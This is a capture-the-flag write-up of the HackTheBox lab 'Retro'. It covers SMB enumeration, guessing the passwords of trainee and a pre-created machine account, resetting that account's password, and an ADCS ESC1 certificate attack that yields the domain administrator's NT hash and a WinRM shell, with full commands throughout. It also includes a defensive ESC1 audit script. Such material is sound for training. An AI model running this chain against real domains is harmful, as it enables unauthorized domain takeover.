Retro

📅 Last Updated: Oct 07, 2025 06:52 | 📄 Size: 27.2 KB | 🎯 Type: HackTheBox Writeup | 🎚️ Difficulty: Easy

Nmap

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ nmap -sC -sV -Pn 10.129.234.44 -oN ./nmap.txt 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 22:40 UTC
Nmap scan report for 10.129.234.44
Host is up (0.30s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-06 11:41:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-06T11:43:24+00:00; -10h58m57s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: 2025-10-06T11:43:23+00:00; -10h58m57s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-06T11:43:24+00:00; -10h58m57s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: 2025-10-06T11:43:23+00:00; -10h58m57s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-06T11:43:23+00:00; -10h58m57s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-06T11:42:38+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-10-05T11:36:50
|_Not valid after:  2026-04-06T11:36:50
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10h58m58s, deviation: 2s, median: -10h58m57s
| smb2-time: 
|   date: 2025-10-06T11:42:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.95 seconds

Add DC.retro.vl (and retro.vl) to our /etc/hosts, pointing at 10.129.234.44.

SMB

I would start with the SMB service, using the guest account.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb 10.129.234.44 -u guest -p ''                                                  
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\guest: 
                                                                                                                                                                                
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb 10.129.234.44 -u guest -p '' --shares
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\guest: 
SMB         10.129.234.44   445    DC               [*] Enumerated shares
SMB         10.129.234.44   445    DC               Share           Permissions     Remark
SMB         10.129.234.44   445    DC               -----           -----------     ------
SMB         10.129.234.44   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.44   445    DC               C$                              Default share
SMB         10.129.234.44   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.44   445    DC               NETLOGON                        Logon server share 
SMB         10.129.234.44   445    DC               Notes                           
SMB         10.129.234.44   445    DC               SYSVOL                          Logon server share 
SMB         10.129.234.44   445    DC               Trainees        READ   

The Trainees share, readable by guest, would be our first target.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ smbclient //dc.retro.vl/Trainees -U 'guest%'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 23 21:58:43 2023
  ..                                DHS        0  Wed Jun 11 14:17:10 2025
  Important.txt                       A      288  Sun Jul 23 22:00:13 2023

                4659711 blocks of size 4096. 1307773 blocks available
smb: \> get Important.txt 
getting file \Important.txt of size 288 as Important.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ cat Important.txt 
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins   

That hints that we should enumerate all the users.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb 10.129.234.44 -u guest -p '' --users 
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\guest: 

But guest is not allowed to list users that way, so let's try RID cycling instead.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u guest -p '' --rid-brute
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\guest: 
SMB         10.129.234.44   445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.44   445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.129.234.44   445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.129.234.44   445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         10.129.234.44   445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.129.234.44   445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.129.234.44   445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         10.129.234.44   445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         10.129.234.44   445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         10.129.234.44   445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         10.129.234.44   445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         10.129.234.44   445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         10.129.234.44   445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.234.44   445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.44   445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.234.44   445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         10.129.234.44   445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         10.129.234.44   445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.234.44   445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.234.44   445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.44   445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.44   445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.129.234.44   445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         10.129.234.44   445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.234.44   445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.129.234.44   445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         10.129.234.44   445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         10.129.234.44   445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         10.129.234.44   445    DC               1109: RETRO\tblack (SidTypeUser)

There's a trainee user, which is likely what the note was referring to. I would also keep an eye on RETRO\BANKING$ (SidTypeUser), which looks like a machine account.

From the admins' message, I guess the password of trainee would be the account name itself.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u trainee -p trainee
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\trainee:trainee 

Now we can use this credential to check SMB again.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u trainee -p trainee --shares
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\trainee:trainee 
SMB         10.129.234.44   445    DC               [*] Enumerated shares
SMB         10.129.234.44   445    DC               Share           Permissions     Remark
SMB         10.129.234.44   445    DC               -----           -----------     ------
SMB         10.129.234.44   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.44   445    DC               C$                              Default share
SMB         10.129.234.44   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.44   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.234.44   445    DC               Notes           READ            
SMB         10.129.234.44   445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.234.44   445    DC               Trainees        READ    

Now another share, Notes, can be accessed.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ smbclient //dc.retro.vl/Notes -U 'trainee%trainee' 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Apr  9 03:12:49 2025
  ..                                DHS        0  Wed Jun 11 14:17:10 2025
  ToDo.txt                            A      248  Sun Jul 23 22:05:56 2023
  user.txt                            A       32  Wed Apr  9 03:13:01 2025

                4659711 blocks of size 4096. 1325651 blocks available

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ cat ToDo.txt 
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

Shell as BANKING$

I noticed above that there is an additional computer in the domain, named BANKING$, and the note calls it a pre-created computer account. I guess its password would be banking or Banking. Let's have a try:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u 'BANKING$' -p banking
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 

You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet: a pre-created computer account has never joined the domain and changed its initial password, so a correct password returns this status instead of STATUS_LOGON_FAILURE.

Now let's try to change its password:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ changepasswd.py -newpass wither123. 'retro.vl/BANKING$:banking@dc.retro.vl'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 280, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
           ~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1092, in login
    if packet.isValidAnswer(STATUS_SUCCESS):
       ~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT(The account used is a computer account. Use your global user account or local user account to access this server.)    

But it gives us the same error, so the SMB-based password change will not work here. We can try the RPC (SAMR) protocol instead:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ changepasswd.py -newpass wither123. 'retro.vl/BANKING$:banking@dc.retro.vl' -protocol rpc-samr
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

It worked, and we can verify it:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u 'BANKING$' -p wither123.
SMB         10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         10.129.234.44   445    DC               [+] retro.vl\BANKING$:wither123. 

Or you can just use Kerberos authentication:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u 'BANKING$' -p banking -k
SMB         dc.retro.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) 
SMB         dc.retro.vl     445    DC               [+] retro.vl\BANKING$:banking 

Privilege escalation

BANKING$ has the same SMB access permissions as trainee, and I can't get a shell via WinRM with it. I would continue by checking ADCS. I used certipy to list all the vulnerable templates:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad find -u 'BANKING$@retro.vl' -p wither123. -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Template Created                    : 2023-07-23T21:17:47+00:00
    Template Last Modified              : 2023-07-23T21:18:39+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Full Control Principals         : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Write Property Enroll           : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
    [+] User Enrollable Principals      : RETRO.VL\Domain Computers
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.

The RetroClients template is vulnerable to ESC1: Domain Computers can enroll in it, the enrollee supplies the subject, and the template allows client authentication with no manager approval or authorized signatures required. Since BANKING$ is a computer account, it is a member of Domain Computers and can enroll.
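To audit templates for the ESC1 conditions listed above rather than only reading certipy's verdict, here is an added Python example (not certipy's own code) that parses certipy-style find output and reports which low-privilege principals can enroll in a template that lets the enrollee supply the subject. The sample text is constructed from the RetroClients fields shown above plus a hardened variant (RetroClientsFixed) that is an assumption, and the LOW_PRIV set is the auditor's own choice.

```python
import re

# Principals a template with enrollee-supplied subject must not let enroll.
# Assumption: this is the auditor's own low-privilege set, not a certipy list.
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed sample in certipy's text layout: the RetroClients fields from the
# writeup that matter for ESC1, next to a hardened variant (RetroClientsFixed).
SAMPLE = r"""Certificate Templates
  0
    Template Name                       : RetroClients
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
  1
    Template Name                       : RetroClientsFixed
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
"""

FIELD = re.compile(r"^\s+(.+?)\s+:\s*(.*)$")   # "    Key   : value"
INDEX = re.compile(r"^\s+\d+$")                 # "  0" starts a template

def parse_templates(text):
    """Return one dict per template; every value is a list of lines."""
    templates, current, last_key, in_section = [], None, None, False
    for line in text.splitlines():
        if line.startswith("Certificate Templates"):
            in_section = True
        elif not in_section or not line.strip():
            continue
        elif INDEX.match(line):
            current = {}
            templates.append(current)
            last_key = None
        elif current is None:
            continue
        elif (m := FIELD.match(line)):
            last_key = m.group(1)
            current[last_key] = [m.group(2)]
        elif last_key and len(line) - len(line.lstrip()) >= 40:
            current[last_key].append(line.strip())  # continuation value
        else:
            last_key = None                         # bare section header
    return templates

def first(t, key, default=""):
    return t.get(key, [default])[0]

def esc1_exposure(t):
    """Low-privilege principals that can enroll in an ESC1-shaped template."""
    shaped = (first(t, "Enabled") == "True"
              and (first(t, "Client Authentication") == "True"
                   or first(t, "Any Purpose") == "True")
              and first(t, "Enrollee Supplies Subject") == "True"
              and first(t, "Requires Manager Approval") == "False"
              and first(t, "Authorized Signatures Required", "0") == "0")
    if not shaped:
        return []
    # Strip the "DOMAIN\" prefix and keep only principals from the low-priv set.
    return sorted(p for p in t.get("Enrollment Rights", [])
                  if p.split("\\", 1)[-1] in LOW_PRIV)

def audit(text):
    """Map template name -> offending principals (empty list means not ESC1)."""
    return {first(t, "Template Name"): esc1_exposure(t)
            for t in parse_templates(text)}

if __name__ == "__main__":
    for name, who in audit(SAMPLE).items():
        print(f"{name}: {'ESC1 via ' + ', '.join(who) if who else 'ok'}")
```

Flipping EnrolleeSuppliesSubject off, requiring manager approval, or removing Domain Computers from the enrollment rights each clears the finding, which is the remediation order a defender would apply to RetroClients.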

Let's exploit it step by step. First, sync our clock with the DC, since the nmap scan showed roughly 11 hours of skew and Kerberos will reject requests with that much drift. Then request an administrator certificate:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ sudo ntpdate retro.vl 
2025-10-06 12:18:11.715839 (+0000) -39328.431598 +/- 0.157972 retro.vl 10.129.234.44 s1 no-leap
CLOCK: time stepped by -39328.431598
                                                                                                                                                                                
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad req -u 'BANKING$@retro.vl' -p wither123. -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 9
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N): y
[*] Saving private key to '9.key'
[*] Wrote private key to '9.key'
[-] Failed to request certificate

It returns an error saying the public key does not meet the minimum size; the template requires a minimum RSA key length of 4096. So let's set the key size:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad req -u 'BANKING$@retro.vl' -p wither123. -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Then we can use this certificate to authenticate as administrator:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.234.44
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@retro.vl'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more information

This fails too: it reports a SID mismatch between the certificate and the user, so we have to embed the administrator's object SID in the certificate.

We can use lookupsid.py to get the domain SID (administrator is RID 500), or use BloodHound to collect the data.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ lookupsid.py retro.vl/BANKING$:wither123.@dc.retro.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at dc.retro.vl
[*] StringBinding ncacn_np:dc.retro.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)

Now request the certificate again, this time with -sid:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad req -u 'BANKING$@retro.vl' -p wither123. -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 -sid S-1-5-21-2983547755-698260136-4283918172-500 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 12
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'

Then auth as administrator:

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@retro.vl'
[*]     SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*]     Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

We can pass this NT hash to evil-winrm to get a shell:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ evil-winrm -i dc.retro.vl -u administrator -H 252fac7066d93dd009d4fd2cd0368389 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
retro\administrator

Description

"Retro" is an Easy Windows machine that exposes an Active Directory Domain Controller. Initial access was gained through SMB enumeration and the takeover of a pre-created machine account. Privilege escalation was achieved by exploiting Active Directory Certificate Services, specifically the "ESC1" attack (impersonating an administrative user through a certificate template that lets the enrollee supply the subject).